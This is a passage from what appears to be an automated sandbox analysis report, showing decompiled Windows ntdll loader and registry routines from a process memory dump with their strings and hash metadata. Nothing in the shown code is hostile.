                                          														__eflags = _v16 - _t147;
                                          														if(_v16 != _t147) {
                                          															goto L22;
                                          														} else {
                                          															E00F32280(_t92, 0x10086cc);
                                          															_t94 = E00FE9DFB( &_v20);
                                          															__eflags = _t94 - 1;
                                          															if(_t94 != 1) {
                                          															}
                                          															asm("movsd");
                                          															asm("movsd");
                                          															asm("movsd");
                                          															asm("movsd");
                                          															 *_t118 =  *_t118 + 1;
                                          															asm("adc dword [ebx+0x4], 0x0");
                                          															_t95 = E00F461A0( &_v32);
                                          															__eflags = _t95;
                                          															if(_t95 != 0) {
                                          																__eflags = _v32 | _v28;
                                          																if((_v32 | _v28) != 0) {
                                          																	_t71 = _t118 + 0x40; // 0x3f
                                          																	_t134 = _t71;
                                          																	goto L55;
                                          																}
                                          															}
                                          															goto L30;
                                          														}
                                          													}
                                          													goto L56;
                                          												}
                                          												_t92 = 0x1005c64 + _t91 * 8;
                                          												asm("lock xadd [eax], ecx");
                                          												_t131 = (_t129 | 0xffffffff) - 1;
                                          												goto L37;
                                          											}
                                          										}
                                          										goto L56;
                                          									} else {
                                          										_t143 = E00F28A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                          										__eflags = _t143;
                                          										if(_t143 != 0) {
                                          											_t157 = _v12;
                                          											_t103 = 0;
                                          											__eflags = 0;
                                          											_t136 =  &(_t157[1]);
                                          											 *(_t161 + 0x64) = _t136;
                                          											_t151 =  *_t157;
                                          											_v20 = _t136;
                                          											while(1) {
                                          												__eflags =  *((intOrPtr*)(0x1005c60 + _t103 * 8)) - _t151;
                                          												if( *((intOrPtr*)(0x1005c60 + _t103 * 8)) == _t151) {
                                          													break;
                                          												}
                                          												_t103 = _t103 + 1;
                                          												__eflags = _t103 - 5;
                                          												if(_t103 < 5) {
                                          													continue;
                                          												}
                                          												L21:
                                          												_t105 = E00F5F380(_t136, 0xef1184, 0x10);
                                          												__eflags = _t105;
                                          												if(_t105 != 0) {
                                          													__eflags =  *_t157 -  *_v16;
                                          													if( *_t157 >=  *_v16) {
                                          														goto L22;
                                          													} else {
                                          														asm("cdq");
                                          														_t166 = _t157[5] & 0x0000ffff;
                                          														_t108 = _t157[5] & 0x0000ffff;
                                          														asm("cdq");
                                          														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                          														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                          														if(__eflags > 0) {
                                          															L29:
                                          															E00F32280(_t108, 0x10086cc);
                                          															 *_t118 =  *_t118 + 1;
                                          															_t42 = _t118 + 0x40; // 0x3f
                                          															_t156 = _t42;
                                          															asm("adc dword [ebx+0x4], 0x0");
                                          															asm("movsd");
                                          															asm("movsd");
                                          															asm("movsd");
                                          															asm("movsd");
                                          															_t110 = E00F461A0( &_v32);
                                          															__eflags = _t110;
                                          															if(_t110 != 0) {
                                          																__eflags = _v32 | _v28;
                                          																if((_v32 | _v28) != 0) {
                                          																	_t134 = _v20;
                                          																	L55:
                                          																	E00FE9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                          																}
                                          															}
                                          															L30:
                                          															 *_t118 =  *_t118 + 1;
                                          															asm("adc dword [ebx+0x4], 0x0");
                                          															E00F2FFB0(_t118, _t156, 0x10086cc);
                                          															goto L22;
                                          														} else {
                                          															if(__eflags < 0) {
                                          																goto L22;
                                          															} else {
                                          																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                          																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                          																	goto L22;
                                          																} else {
                                          																	goto L29;
                                          																}
                                          															}
                                          														}
                                          													}
                                          													goto L56;
                                          												}
                                          												goto L22;
                                          											}
                                          											asm("lock inc dword [eax]");
                                          											goto L21;
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          						return _t143;
                                          					}
                                          				} else {
                                          					_push( &_v8);
                                          					_push( *((intOrPtr*)(__ecx + 0x50)));
                                          					_push(__ecx + 0x40);
                                          					_push(_t121);
                                          					_push(0xffffffff);
                                          					_t80 = E00F59A00();
                                          					_t159 = _t80;
                                          					if(_t159 < 0) {
                                          						L8:
                                          						return _t80;
                                          					} else {
                                          						goto L2;
                                          					}
                                          				}
                                          				L56:
                                          			}

                                          Strings
                                          • minkernel\ntdll\ldrsnap.c, xrefs: 00F79C28
                                          • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 00F79C18
                                          • RegLoadRegistryInfo, xrefs: 00F2879B
                                          • LdrpDoPostSnapWork, xrefs: 00F79C1E
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$RegLoadRegistryInfo$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 2994545307-709946665
                                          • Opcode ID: 678638e7af483d212b85f3445204ace9aae47c1b3df7eba433891c028360dece
                                          • Instruction ID: ed29fd98bcf789f42a4283fceab46ceec51eab50f45ebed67d6b64b21c5aa863
                                          • Opcode Fuzzy Hash: 678638e7af483d212b85f3445204ace9aae47c1b3df7eba433891c028360dece
                                          • Instruction Fuzzy Hash: EB912531E0122ADFDF18DF58E881ABA73B5FF54360F548069E845AB241DB70ED42EB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 98%
                                          			E00F27E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                          				char _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				char _v24;
                                          				signed int _t73;
                                          				void* _t77;
                                          				char* _t82;
                                          				char* _t87;
                                          				signed char* _t97;
                                          				signed char _t102;
                                          				intOrPtr _t107;
                                          				signed char* _t108;
                                          				intOrPtr _t112;
                                          				intOrPtr _t124;
                                          				intOrPtr _t125;
                                          				intOrPtr _t126;
                                          
                                          				_t107 = __edx;
                                          				_v12 = __ecx;
                                          				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                          				_t124 = 0;
                                          				_v20 = __edx;
                                          				if(E00F2CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                          					_t112 = _v8;
                                          				} else {
                                          					_t112 = 0;
                                          					_v8 = 0;
                                          				}
                                          				if(_t112 != 0) {
                                          					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                          						_t124 = 0xc000007b;
                                          						goto L8;
                                          					}
                                          					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                          					 *(_t125 + 0x34) = _t73;
                                          					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                          						goto L3;
                                          					}
                                          					 *(_t125 + 0x34) = _t73 | "RegLoadRegistryInfo";
                                          					_t124 = E00F1C9A4( *((intOrPtr*)(_t125 + 0x18)));
                                          					if(_t124 < 0) {
                                          						goto L8;
                                          					} else {
                                          						goto L3;
                                          					}
                                          				} else {
                                          					L3:
                                          					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                          						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                          						L8:
                                          						return _t124;
                                          					}
                                          					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                          						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                          							goto L5;
                                          						}
                                          						_t102 =  *0x1005780; // 0x0
                                          						if((_t102 & 0x00000003) != 0) {
                                          							E00F95510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                          							_t102 =  *0x1005780; // 0x0
                                          						}
                                          						if((_t102 & 0x00000010) != 0) {
                                          							asm("int3");
                                          						}
                                          						_t124 = 0xc0000428;
                                          						goto L8;
                                          					}
                                          					L5:
                                          					if(( *(_t125 + 0x34) & "RegLoadRegistryInfo") != 0) {
                                          						goto L8;
                                          					}
                                          					_t77 = _a4 - 0x40000003;
                                          					if(_t77 == 0 || _t77 == 0x33) {
                                          						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                          						if(E00F37D50() != 0) {
                                          							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          						} else {
                                          							_t82 = 0x7ffe0384;
                                          						}
                                          						_t108 = 0x7ffe0385;
                                          						if( *_t82 != 0) {
                                          							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                          								if(E00F37D50() == 0) {
                                          									_t97 = 0x7ffe0385;
                                          								} else {
                                          									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                          								}
                                          								if(( *_t97 & 0x00000020) != 0) {
                                          									E00F97016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                          								}
                                          							}
                                          						}
                                          						if(_a4 != 0x40000003) {
                                          							L14:
                                          							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                          							if(E00F37D50() != 0) {
                                          								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          							} else {
                                          								_t87 = 0x7ffe0384;
                                          							}
                                          							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                          								if(E00F37D50() != 0) {
                                          									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                          								}
                                          								if(( *_t108 & 0x00000020) != 0) {
                                          									E00F97016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                          								}
                                          							}
                                          							goto L8;
                                          						} else {
                                          							_v16 = _t125 + 0x24;
                                          							_t124 = E00F4A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                          							if(_t124 < 0) {
                                          								E00F1B1E1(_t124, 0x1490, 0, _v16);
                                          								goto L8;
                                          							}
                                          							goto L14;
                                          						}
                                          					} else {
                                          						goto L8;
                                          					}
                                          				}
                                          			}




















                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$RegLoadRegistryInfo$minkernel\ntdll\ldrmap.c
                                          • API String ID: 0-4119253279
                                          • Opcode ID: cab91b0a2f8687a6f41da372c41beac86e073202a2565c45e40bf7a620291db6
                                          • Instruction ID: 2ddb8586a6b337251d4e059ea13c55ef8b8d98f62289ca3b59a2bf43d4ace5fa
                                          • Opcode Fuzzy Hash: cab91b0a2f8687a6f41da372c41beac86e073202a2565c45e40bf7a620291db6
                                          • Instruction Fuzzy Hash: AE515532A0CB449BEB21EB58D945B2A77E0FF01320F15019AE9559B3E1C774EC00EBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 44%
                                          			E00F48E00(void* __ecx) {
                                          				signed int _v8;
                                          				char _v12;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				intOrPtr* _t32;
                                          				intOrPtr _t35;
                                          				intOrPtr _t43;
                                          				void* _t46;
                                          				intOrPtr _t47;
                                          				void* _t48;
                                          				signed int _t49;
                                          				void* _t50;
                                          				intOrPtr* _t51;
                                          				signed int _t52;
                                          				void* _t53;
                                          				intOrPtr _t55;
                                          
                                          				_v8 =  *0x100d360 ^ _t52;
                                          				_t49 = 0;
                                          				_t48 = __ecx;
                                          				_t55 =  *0x1008464; // 0x75150110
                                          				if(_t55 == 0) {
                                          					L9:
                                          					if( !_t49 >= 0) {
                                          						if(( *0x1005780 & 0x00000003) != 0) {
                                          							E00F95510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                          						}
                                          						if(( *0x1005780 & 0x00000010) != 0) {
                                          							asm("int3");
                                          						}
                                          					}
                                          					return E00F5B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                          				}
                                          				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                          				_t43 =  *0x1007984; // 0xaa2bb8
                                          				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                          					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                          					if(_t48 == _t43) {
                                          						_t50 = 0x5c;
                                          						if( *_t32 == _t50) {
                                          							_t46 = 0x3f;
                                          							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                          								_t32 = _t32 + 8;
                                          							}
                                          						}
                                          					}
                                          					_t51 =  *0x1008464; // 0x75150110
                                          					 *0x100b1e0(_t47, _t32,  &_v12);
                                          					_t49 =  *_t51();
                                          					if(_t49 >= 0) {
                                          						L8:
                                          						_t35 = _v12;
                                          						if(_t35 != 0) {
                                          							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                          								E00F49B10( *((intOrPtr*)(_t48 + 0x48)));
                                          								_t35 = _v12;
                                          							}
                                          							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                          						}
                                          						goto L9;
                                          					}
                                          					if(_t49 != 0xc000008a) {
                                          						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                          							if(_t49 != 0xc00000bb) {
                                          								goto L8;
                                          							}
                                          						}
                                          					}
                                          					if(( *0x1005780 & 0x00000005) != 0) {
                                          						_push(_t49);
                                          						E00F95510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                          						_t53 = _t53 + 0x1c;
                                          					}
                                          					_t49 = 0;
                                          					goto L8;
                                          				} else {
                                          					goto L9;
                                          				}
                                          			}




















                                          Strings
                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 00F89357
                                          • LdrpFindDllActivationContext, xrefs: 00F89331, 00F8935D
                                          • minkernel\ntdll\ldrsnap.c, xrefs: 00F8933B, 00F89367
                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 00F8932A
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 0-3779518884
                                          • Opcode ID: eacc8e41146ea3e56c70c40d714b43793c54c9f481519b5d7b541bba64389b42
                                          • Instruction ID: c265cec4c4aa0459532022d460268b5b47795f28cfe01c11c6206b0ebac95a13
                                          • Opcode Fuzzy Hash: eacc8e41146ea3e56c70c40d714b43793c54c9f481519b5d7b541bba64389b42
                                          • Instruction Fuzzy Hash: DF412B32E003159FDB36AB98C849B7D7AB4BB107E4F094169ED4467191EF74ACC1B381
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 93%
                                          			E00F1E620(void* __ecx, short* __edx, short* _a4) {
                                          				char _v16;
                                          				char _v20;
                                          				intOrPtr _v24;
                                          				char* _v28;
                                          				char _v32;
                                          				char _v36;
                                          				char _v44;
                                          				signed int _v48;
                                          				intOrPtr _v52;
                                          				void* _v56;
                                          				void* _v60;
                                          				char _v64;
                                          				void* _v68;
                                          				void* _v76;
                                          				void* _v84;
                                          				signed int _t59;
                                          				signed int _t74;
                                          				signed short* _t75;
                                          				signed int _t76;
                                          				signed short* _t78;
                                          				signed int _t83;
                                          				short* _t93;
                                          				signed short* _t94;
                                          				short* _t96;
                                          				void* _t97;
                                          				signed int _t99;
                                          				void* _t101;
                                          				void* _t102;
                                          
                                          				_t80 = __ecx;
                                          				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                          				_t96 = __edx;
                                          				_v44 = __edx;
                                          				_t78 = 0;
                                          				_v56 = 0;
                                          				if(__ecx == 0 || __edx == 0) {
                                          					L28:
                                          					_t97 = 0xc000000d;
                                          				} else {
                                          					_t93 = _a4;
                                          					if(_t93 == 0) {
                                          						goto L28;
                                          					}
                                          					_t78 = E00F1F358(__ecx, 0xac);
                                          					if(_t78 == 0) {
                                          						_t97 = 0xc0000017;
                                          						L6:
                                          						if(_v56 != 0) {
                                          							_push(_v56);
                                          							E00F595D0();
                                          						}
                                          						if(_t78 != 0) {
                                          							L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                          						}
                                          						return _t97;
                                          					}
                                          					E00F5FA60(_t78, 0, 0x158);
                                          					_v48 = _v48 & 0x00000000;
                                          					_t102 = _t101 + 0xc;
                                          					 *_t96 = 0;
                                          					 *_t93 = 0;
                                          					E00F5BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                          					_v36 = 0x18;
                                          					_v28 =  &_v44;
                                          					_v64 = 0;
                                          					_push( &_v36);
                                          					_push(0x20019);
                                          					_v32 = 0;
                                          					_push( &_v64);
                                          					_v24 = 0x40;
                                          					_v20 = 0;
                                          					_v16 = 0;
                                          					_t97 = E00F59600();
                                          					if(_t97 < 0) {
                                          						goto L6;
                                          					}
                                          					E00F5BB40(0,  &_v36, L"InstallLanguageFallback");
                                          					_push(0);
                                          					_v48 = 4;
                                          					_t97 = L00F1F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                          					if(_t97 >= 0) {
                                          						if(_v52 != 1) {
                                          							L17:
                                          							_t97 = 0xc0000001;
                                          							goto L6;
                                          						}
                                          						_t59 =  *_t78 & 0x0000ffff;
                                          						_t94 = _t78;
                                          						_t83 = _t59;
                                          						if(_t59 == 0) {
                                          							L19:
                                          							if(_t83 == 0) {
                                          								L23:
                                          								E00F5BB40(_t83, _t102 + 0x24, _t78);
                                          								if(L00F243C0( &_v48,  &_v64) == 0) {
                                          									goto L17;
                                          								}
                                          								_t84 = _v48;
                                          								 *_v48 = _v56;
                                          								if( *_t94 != 0) {
                                          									E00F5BB40(_t84, _t102 + 0x24, _t94);
                                          									if(L00F243C0( &_v48,  &_v64) != 0) {
                                          										 *_a4 = _v56;
                                          									} else {
                                          										_t97 = 0xc0000001;
                                          										 *_v48 = 0;
                                          									}
                                          								}
                                          								goto L6;
                                          							}
                                          							_t83 = _t83 & 0x0000ffff;
                                          							while(_t83 == 0x20) {
                                          								_t94 =  &(_t94[1]);
                                          								_t74 =  *_t94 & 0x0000ffff;
                                          								_t83 = _t74;
                                          								if(_t74 != 0) {
                                          									continue;
                                          								}
                                          								goto L23;
                                          							}
                                          							goto L23;
                                          						} else {
                                          							goto L14;
                                          						}
                                          						while(1) {
                                          							L14:
                                          							_t27 =  &(_t94[1]); // 0x2
                                          							_t75 = _t27;
                                          							if(_t83 == 0x2c) {
                                          								break;
                                          							}
                                          							_t94 = _t75;
                                          							_t76 =  *_t94 & 0x0000ffff;
                                          							_t83 = _t76;
                                          							if(_t76 != 0) {
                                          								continue;
                                          							}
                                          							goto L23;
                                          						}
                                          						 *_t94 = 0;
                                          						_t94 = _t75;
                                          						_t83 =  *_t75 & 0x0000ffff;
                                          						goto L19;
                                          					}
                                          				}
                                          			}































                                          0x00f7546a
                                          0x00f7546d
                                          0x00f7546f
                                          0x00000000
                                          0x00f7546f
                                          0x00f1e70f

                                          Strings
                                          • @, xrefs: 00F1E6C0
                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00F1E68C
                                          • InstallLanguageFallback, xrefs: 00F1E6DB
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                          • API String ID: 0-1757540487
                                          • Opcode ID: a30b53342e85d815b6b0725d45f6488e4b209bd19d41ad6233ae168603251736
                                          • Instruction ID: 6c9e792363f6d8c825cf4a0770a9181bcb8738195b85bf02e75b88b389f2b83d
                                          • Opcode Fuzzy Hash: a30b53342e85d815b6b0725d45f6488e4b209bd19d41ad6233ae168603251736
                                          • Instruction Fuzzy Hash: 6151D1729087059BD710DF24C850AABB3E8BF88B25F04492EF999D7240F774DD48E7A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 60%
                                          			E00FDE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                          				signed int _v20;
                                          				char _v24;
                                          				signed int _v40;
                                          				char _v44;
                                          				intOrPtr _v48;
                                          				signed int _v52;
                                          				unsigned int _v56;
                                          				char _v60;
                                          				signed int _v64;
                                          				char _v68;
                                          				signed int _v72;
                                          				void* __ebx;
                                          				void* __edi;
                                          				char _t87;
                                          				signed int _t90;
                                          				signed int _t94;
                                          				signed int _t100;
                                          				intOrPtr* _t113;
                                          				signed int _t122;
                                          				void* _t132;
                                          				void* _t135;
                                          				signed int _t139;
                                          				signed int* _t141;
                                          				signed int _t146;
                                          				signed int _t147;
                                          				void* _t153;
                                          				signed int _t155;
                                          				signed int _t159;
                                          				char _t166;
                                          				void* _t172;
                                          				void* _t176;
                                          				signed int _t177;
                                          				intOrPtr* _t179;
                                          
                                          				_t179 = __ecx;
                                          				_v48 = __edx;
                                          				_v68 = 0;
                                          				_v72 = 0;
                                          				_push(__ecx[1]);
                                          				_push( *__ecx);
                                          				_push(0);
                                          				_t153 = 0x14;
                                          				_t135 = _t153;
                                          				_t132 = E00FDBBBB(_t135, _t153);
                                          				if(_t132 == 0) {
                                          					_t166 = _v68;
                                          					goto L43;
                                          				} else {
                                          					_t155 = 0;
                                          					_v52 = 0;
                                          					asm("stosd");
                                          					asm("stosd");
                                          					asm("stosd");
                                          					asm("stosd");
                                          					asm("stosd");
                                          					_v56 = __ecx[1];
                                          					if( *__ecx >> 8 < 2) {
                                          						_t155 = 1;
                                          						_v52 = 1;
                                          					}
                                          					_t139 = _a4;
                                          					_t87 = (_t155 << 0xc) + _t139;
                                          					_v60 = _t87;
                                          					if(_t87 < _t139) {
                                          						L11:
                                          						_t166 = _v68;
                                          						L12:
                                          						if(_t132 != 0) {
                                          							E00FDBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                          						}
                                          						L43:
                                          						if(_v72 != 0) {
                                          							_push( *((intOrPtr*)(_t179 + 4)));
                                          							_push( *_t179);
                                          							_push(0x8000);
                                          							E00FDAFDE( &_v72,  &_v60);
                                          						}
                                          						L46:
                                          						return _t166;
                                          					}
                                          					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                          					asm("sbb edi, edi");
                                          					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                          					if(_t90 != 0) {
                                          						_push(0);
                                          						_push(0x14);
                                          						_push( &_v44);
                                          						_push(3);
                                          						_push(_t179);
                                          						_push(0xffffffff);
                                          						if(E00F59730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                          							_push(_t139);
                                          							E00FDA80D(_t179, 1, _v40, 0);
                                          							_t172 = 4;
                                          						}
                                          					}
                                          					_t141 =  &_v72;
                                          					if(E00FDA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                          						_v64 = _a4;
                                          						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                          						asm("sbb edi, edi");
                                          						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                          						if(_t94 != 0) {
                                          							_push(0);
                                          							_push(0x14);
                                          							_push( &_v24);
                                          							_push(3);
                                          							_push(_t179);
                                          							_push(0xffffffff);
                                          							if(E00F59730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                          								_push(_t141);
                                          								E00FDA80D(_t179, 1, _v20, 0);
                                          								_t176 = 4;
                                          							}
                                          						}
                                          						if(E00FDA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                          							goto L11;
                                          						} else {
                                          							_t177 = _v64;
                                          							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                          							_t100 = _v52 + _v52;
                                          							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                          							 *(_t132 + 0x10) = _t146;
                                          							asm("bsf eax, [esp+0x18]");
                                          							_v52 = _t100;
                                          							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                          							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                          							_t47 =  &_a8;
                                          							 *_t47 = _a8 & 0x00000001;
                                          							if( *_t47 == 0) {
                                          								E00F32280(_t179 + 0x30, _t179 + 0x30);
                                          							}
                                          							_t147 =  *(_t179 + 0x34);
                                          							_t159 =  *(_t179 + 0x38) & 1;
                                          							_v68 = 0;
                                          							if(_t147 == 0) {
                                          								L35:
                                          								E00F2B090(_t179 + 0x34, _t147, _v68, _t132);
                                          								if(_a8 == 0) {
                                          									E00F2FFB0(_t132, _t177, _t179 + 0x30);
                                          								}
                                          								asm("lock xadd [eax], ecx");
                                          								asm("lock xadd [eax], edx");
                                          								_t132 = 0;
                                          								_v72 = _v72 & 0;
                                          								_v68 = _v72;
                                          								if(E00F37D50() == 0) {
                                          									_t113 = 0x7ffe0388;
                                          								} else {
                                          									_t177 = _v64;
                                          									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                          								}
                                          								if( *_t113 == _t132) {
                                          									_t166 = _v68;
                                          									goto L46;
                                          								} else {
                                          									_t166 = _v68;
                                          									E00FCFEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                          									goto L12;
                                          								}
                                          							} else {
                                          								L23:
                                          								while(1) {
                                          									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                          										_t122 =  *_t147;
                                          										if(_t159 == 0) {
                                          											L32:
                                          											if(_t122 == 0) {
                                          												L34:
                                          												_v68 = 0;
                                          												goto L35;
                                          											}
                                          											L33:
                                          											_t147 = _t122;
                                          											continue;
                                          										}
                                          										if(_t122 == 0) {
                                          											goto L34;
                                          										}
                                          										_t122 = _t122 ^ _t147;
                                          										goto L32;
                                          									}
                                          									_t122 =  *(_t147 + 4);
                                          									if(_t159 == 0) {
                                          										L27:
                                          										if(_t122 != 0) {
                                          											goto L33;
                                          										}
                                          										L28:
                                          										_v68 = 1;
                                          										goto L35;
                                          									}
                                          									if(_t122 == 0) {
                                          										goto L28;
                                          									}
                                          									_t122 = _t122 ^ _t147;
                                          									goto L27;
                                          								}
                                          							}
                                          						}
                                          					}
                                          					_v72 = _v72 & 0x00000000;
                                          					goto L11;
                                          				}
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: `$`
                                          • API String ID: 0-197956300
                                          • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                          • Instruction ID: 659040c1fba59326dfa927a3fc1f4fc121b08c908d2c13253dc2d6f85bcaf7d1
                                          • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                          • Instruction Fuzzy Hash: BA919F326043419BE764EE25CD41B1BB7E6BF84724F18892EF9A5CB380D774E804EB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 63%
                                          			E00F12D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                          				signed char _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				signed int _v52;
                                          				void* __esi;
                                          				void* __ebp;
                                          				intOrPtr _t55;
                                          				signed int _t57;
                                          				signed int _t58;
                                          				char* _t62;
                                          				signed char* _t63;
                                          				signed char* _t64;
                                          				signed int _t67;
                                          				signed int _t72;
                                          				signed int _t77;
                                          				signed int _t78;
                                          				signed int _t88;
                                          				intOrPtr _t89;
                                          				signed char _t93;
                                          				signed int _t97;
                                          				signed int _t98;
                                          				signed int _t102;
                                          				signed int _t103;
                                          				intOrPtr _t104;
                                          				signed int _t105;
                                          				signed int _t106;
                                          				signed char _t109;
                                          				signed int _t111;
                                          				void* _t116;
                                          
                                          				_t102 = __edi;
                                          				_t97 = __edx;
                                          				_v12 = _v12 & 0x00000000;
                                          				_t55 =  *[fs:0x18];
                                          				_t109 = __ecx;
                                          				_v8 = __edx;
                                          				_t86 = 0;
                                          				_v32 = _t55;
                                          				_v24 = 0;
                                          				_push(__edi);
                                          				if(__ecx == 0x1005350) {
                                          					_t86 = 1;
                                          					_v24 = 1;
                                          					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                          				}
                                          				_t103 = _t102 | 0xffffffff;
                                          				if( *0x1007bc8 != 0) {
                                          					_push(0xc000004b);
